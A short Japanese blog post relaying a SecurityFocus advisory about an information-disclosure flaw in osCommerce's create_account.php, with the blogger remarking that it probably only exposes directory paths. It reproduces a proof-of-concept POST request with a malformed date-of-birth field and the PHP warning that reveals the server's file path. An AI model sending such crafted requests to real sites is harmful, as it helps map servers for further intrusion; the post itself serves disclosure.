osCommerce 'create_account.php' Information Disclosure Vulnerability(情報元のブックマーク数)
またもや、osCommerceに情報表示な脆弱性が存在とのこと。
osCommerce is prone to an information-disclosure vulnerability because it fails to sanitize user-supplied input.
http://www.securityfocus.com/bid/31209/discuss
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
ディレクトリが見えるくらいかな・・・
POST /oscommerce/create_account.php
http://www.securityfocus.com/archive/1/496417
action=process&gender=m&firstname=john&lastname=smith&dob=FOOBAR&email_a
ddre
ss=email (at) address (dot) com [email concealed]&company=foobar&street_address=foobar&suburb=foobar&
post
code=foobar&city=foobar&state=foobar&country=1&telephone1=123456789&fax=
1234
56789&newsletter=on&password=foobar&confirmation=foobar
Result:
Warning: checkdate() expects parameter 3 to be long, string given in
/var/www/oscommerce/create_account.php on line 80